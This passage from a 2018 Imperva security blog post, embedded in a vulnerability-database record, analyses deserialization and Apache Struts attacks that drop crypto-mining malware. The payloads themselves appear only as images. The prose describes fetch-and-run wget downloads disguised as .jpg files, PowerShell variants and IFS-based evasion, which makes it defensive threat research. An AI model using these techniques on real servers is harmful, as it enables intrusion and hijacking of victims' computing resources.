CVE-2017-10271. The payload is sent in the HTTP request\u2019s body using a serialized Java object through XML representation.\n\n[![Attack vector containing serialized java array into XML fig 5](https://www.imperva.com/blog/wp-content/uploads/2018/01/Attack-vector-containing-serialized-java-array-into-XML-fig-5.png)](<https://www.imperva.com/blog/wp-content/uploads/2018/01/Attack-vector-containing-serialized-java-array-into-XML-fig-5.png>)\n\n_Figure 5: Attack vector containing a serialized java array into an XML_\n\nThe fact that this is a Java array can be seen by the hierarchical structure of the parameters, with the suffix of **\u201cjava/void/array/void/string\u201d**. The attacker is trying to run a bash script on the attacked server.\n\nThis bash script tries to send an HTTP request using \u201cwget\u201d OS command, download a shell script disguised as a picture file (note the jpg file extension) and run it. Few interesting notes can be made examining this command:\n\n * The existence of shell and \u201cwget\u201d commands indicate that this payload is targeting Linux systems\n * Using a picture file extension is usually done to evade security controls\n * The **\u201c-q\u201d** parameter to \u201cwget\u201d stands for \u201cquiet\u201d, this means that \u201cwget\u201d will have no output to the console, hence it will be harder to note that such a request was even made. Once the downloaded script runs the server is infected with a crypto mining malware trying to mine Monero digital coins (a crypto currency similar to Bitcoin).\n\nThe next script (see Figure 6) tries to exploit the same vulnerability, but this time the payload is targeting Windows servers using cmd.exe and Powershell commands to download the malware and run it.\n\n[![Attack vector infect Windows server with crypto mining malware fig 6](https://www.imperva.com/blog/wp-content/uploads/2018/01/Attack-vector-infect-Windows-server-with-crypto-mining-malware-fig-6.png)](<https://www.imperva.com/blog/wp-content/uploads/2018/01/Attack-vector-infect-Windows-server-with-crypto-mining-malware-fig-6.png>)\n\n_Figure 6: Attack vector trying to infect Windows server with crypto mining malware_\n\nThis indicates that there are two different infection methods for Windows and Linux server, each system with its designated script.\n\nAnother example is the following payload (Figure 7) that we pulled from an attack trying to exploit a [deserialization vulnerability](<http://seclists.org/oss-sec/2016/q1/461>) with a Java serialized object.\n\n[![Attack vector containing java serialized object](https://www.imperva.com/blog/wp-content/uploads/2018/01/Attack-vector-containing-java-serialized-object.jpg)](<https://www.imperva.com/blog/wp-content/uploads/2018/01/Attack-vector-containing-java-serialized-object.jpg>)\n\n_Figure 7: Attack vector containing a Java serialized object trying to download a crypto miner_\n\nThe \u201cbad\u201d encoding is an artifact of Java serialization, where the object is represented in the byte stream.\n\nStill, we can see a script in plain text marked in yellow. Shown as an image below is a variable that defines an internal field separator, where in this case it is just a variable for space. The variable is probably used instead of a space to try to make the payload harder to detect.\n\n[![](https://www.imperva.com/blog/wp-content/uploads/2018/01/insert-into-paragraph.jpg)](<https://www.imperva.com/blog/wp-content/uploads/2018/01/insert-into-paragraph.jpg>)\n\nJust as in the previous examples, this Bash script targets Linux servers that send an HTTP request using \u201cwget\u201d to download a crypto miner.\n\n## Beyond Insecure Deserialization\n\nThe common denominator of the attacks above is that attackers are trying to infect the server with a crypto mining malware by using an insecure deserialization vulnerability. However insecure deserialization is not the only method to achieve this goal.\n\nBelow (Figure 8) we see an example of another attack payload, this time at the \u201cContent-Type\u201d header.\n\n[![Attack vector using RCE vulnerability of Apache Struts fig 8](https://www.imperva.com/blog/wp-content/uploads/2018/01/Attack-vector-using-RCE-vulnerability-of-Apache-Struts-fig-8.jpg)](<https://www.imperva.com/blog/wp-content/uploads/2018/01/Attack-vector-using-RCE-vulnerability-of-Apache-Struts-fig-8.jpg>)\n\n_Figure 8: Attack vector using an RCE vulnerability of Apache Struts_\n\nThis attack tries to exploit **CVE-2017-5638**, a well-known RCE vulnerability related to Apache Struts which was published in March 2017 and was covered in a [previous blog post](<https://www.imperva.com/blog/2017/03/cve-2017-5638-new-remote-code-execution-rce-vulnerability-in-apache-struts-2/>).\n\nWhen it was originally published we saw no indications of crypto miners in the attacks\u2019 payloads related to this CVE, and most of the payloads were reconnaissance attacks.\n\nHowever, in this attack the payload (marked in yellow above) is very similar to the payload from the previous example. Using the same remote server and the exact same script, it infected the server with crypto mining malware.\n\nThis old attack method with a new payload suggests a new trend in the cyber arena \u2013 attackers try to exploit RCE vulnerabilities, new and old, to turn vulnerable servers into crypto miners and get a faster ROI for their \u201ceffort\u201d.\n\n## Recommendations\n\nGiven the many new vulnerabilities related to insecure deserialization that were discovered this year, and its appearance in the OWASP top 10 security risks, we expect to see newer related vulnerabilities released in 2018. In the meantime, organizations using affected servers are advised to use the latest patch to mitigate these vulnerabilities.\n\nAn alternative to manual patching is virtual patching. Virtual patching actively protects web applications from attacks, reducing the window of exposure and decreasing the cost of emergency patches and fix cycles.\n\nA WAF that provides virtual patching doesn\u2019t interfere with the normal application workflow, and keeps the site protected while allowing the site owners to control the patching process timeline.\n\nLearn more about how to protect your web applications from vulnerabilities with [Imperva WAF solutions](<https://www.imperva.com/products/application-security/web-application-firewall-waf/>).", "edition": 2, "cvss3": {}, "published": "2018-01-24T17:45:08", "type": "impervablog", "title": "Deserialization Attacks Surge Motivated by Illegal Crypto-mining", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-4858", "CVE-2015-3253", "CVE-2015-4852", "CVE-2015-5254", "CVE-2015-5348", "CVE-2015-6420", "CVE-2015-6555", "CVE-2015-6576", "CVE-2015-6934", "CVE-2015-7253", "CVE-2015-7450", "CVE-2015-7501", "CVE-2015-8103", "CVE-2015-8237", "CVE-2015-8238", "CVE-2015-8360", "CVE-2015-8545", "CVE-2015-8581", "CVE-2015-8765", "CVE-2016-0714", "CVE-2016-0779", "CVE-2016-0788", "CVE-2016-0958", "CVE-2016-1291", "CVE-2016-1487", "CVE-2016-1985", "CVE-2016-1986", "CVE-2016-1997", "CVE-2016-1998", "CVE-2016-1999", "CVE-2016-2000", "CVE-2016-2003", "CVE-2016-2170", "CVE-2016-2173", "CVE-2016-2510", "CVE-2016-3415", "CVE-2016-3427", "CVE-2016-3461", "CVE-2016-3642", "CVE-2016-4372", "CVE-2016-4385", "CVE-2016-5004", "CVE-2016-5229", "CVE-2016-6809", "CVE-2016-7462", "CVE-2016-8735", "CVE-2016-8744", "CVE-2016-8749", "CVE-2016-9299", "CVE-2016-9606", "CVE-2017-1000353", "CVE-2017-10271", "CVE-2017-11283", "CVE-2017-11284", "CVE-2017-12149", "CVE-2017-2608", "CVE-2017-3066", "CVE-2017-3159", "CVE-2017-5586", "CVE-2017-5638", "CVE-2017-5641", "CVE-2017-5645", "CVE-2017-5878", "CVE-2017-7504", "CVE-2017-9805", "CVE-2017-9830", "CVE-2017-9844"], "modified": "2018-01-24T17:45:08", "id": "IMPERVABLOG:4F187FDBA230373382F26BA12E00F8E7", "href": "https://www.imperva.com/blog/2018/01/deserialization-attacks-surge-motivated-by-illegal-crypto-mining/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}